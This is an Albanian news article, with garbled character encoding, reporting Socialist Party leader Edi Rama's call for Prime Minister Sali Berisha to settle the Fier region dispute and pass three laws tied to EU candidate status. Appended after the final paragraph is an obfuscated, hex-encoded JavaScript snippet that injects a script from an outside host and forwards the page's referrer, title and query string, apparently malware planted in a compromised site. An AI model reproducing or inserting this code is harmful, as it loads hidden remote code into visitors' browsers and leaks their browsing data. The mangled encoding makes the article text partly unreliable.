largea_edirama1353312376

Rama: Berisha zbato ligjin pA�r a�?Fierina�� pastaj kA�rko 3 ligjet e reja

Pas apelit nga Kryeministri Sali Berisha ndaj kundA�rshtarit politik, Edi Rama, qA� tA� japA� aprovimin pA�r votim tA� 3 ligjeve tA� mbetura, ka reaguar me njA� deklaratA� kryetari i PartisA� Socialiste.

a�?Zgjidhja demokratike e problemit tA� Qarkut Fier dhe votimi i menjA�hershA�m i tre akteve tA� pA�rcaktuara si tA� nevojshme nga Komisioni Europian janA� thelbi i apelit tA� tretA� publik tA� Kryetarit tA� PartisA� Socialiste, Edi Rama, ndaj kryetarit tA� PartisA� Demokratike dhe gjithA� kryetarA�ve tA� partive parlamentarea�?, citon selia rozA� me anA� tA� njA� deklarate pA�r shtyp.

Sipas deklaratA�s, Edi Rama rishprehu publikisht nevojA�n pA�r tA� mbledhur sa mA� parA� tryezA�n e partive parlamentare. a�?Duke shprehur bindjen se njA� tryezA� e tA� gjitha forcave parlamentare qeverisA�se dhe opozitare mund tA� prodhojA� konsensusin e nevojshA�m nA� kA�tA� moment kur koha nuk preta�?.

Kryesocialisti shton se tA� gjithA� ata qA� e dA�shirojnA� vA�rtet statusin e kandidatit pA�r ShqipA�rinA� kanA� detyrimin tA� provojnA� se ShqipA�ria jo thjesht dhe vetA�m i miraton, por dhe i zbaton ligjet.

a�?Zgjidhja e problemit tA� Qarkut Fier, pA�rveA�se do i hapte rrugA� miratimit tA� tre akteve, do tA� ofronte edhe njA� shembull kuptimplotA� pA�r BE-nA� se qeveria dhe opozita shqiptare kanA� vullnet tA� mirA� pA�r tA� miratuar, por edhe zbatuar ligjeta�?.

Kryetari i opozitA�s ritheksoi se problemin e Fierit e ka krijuar politika dhe mund e duhet ta zgjidhA� politika.
a�?I takon kryetarit tA� PartisA� Demokratike, kryeministA�r i vendit, qA� ta pranojA� detyrA�n pA�r ta zgjidhur bashkA� me opozitA�n problemin e Qarkut tA� Fierit, nA� frymA�n e ligjit, tA� dialogut tA� domosdoshA�m dhe tA� vetA� integrimit europian, duke hapur kA�shtu rrugA�n e miratimit tA� tre aktevea�?.

Kryetari i opozitA�s shprehu gatishmA�rinA� e plotA� pA�r tA� pA�rmbushur A�do detyrim tA� opozitA�s, por duke theksuar se, nA� tA� njA�jtA�n kohA� kryeministri nuk duhet ta��i shmanget kurrsesi pA�rmbushjes sA� detyrimeve tA� qeverisA�.

Edi Rama rinA�nvizon edhe njA�herA� se a�?edhe pse shtete tA� rA�ndA�sishme anA�tare tA� BE-sA� i konsiderojnA� tA� pamjaftueshme kA�to tre akte pA�r tA� miratuar statusin – pikA�risht sepse A�shtA� zbatimi i ligjeve dhe jo thjesht ligjvA�nia ajo A�ka kA�rkohet me tA� drejtA� prej ShqipA�risA� -, palA�t duhet tA� bA�jnA� tA� pamundurA�n deri nA� orA�n e fundita�?.

Duke u dhA�nA� zgjidhjen pA�r Fierin, Rama thekson se mA� pas, qeveria dhe opozita mund ta��u drejtohen pastaj me njA� apel tA� pA�rbashkA�t tA� gjitha vendeve anA�tare tA� Bashkimit Europian nA� prag tA� vendimmarrjes pA�r statusin e kandidatit pA�r ShqipA�rinA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}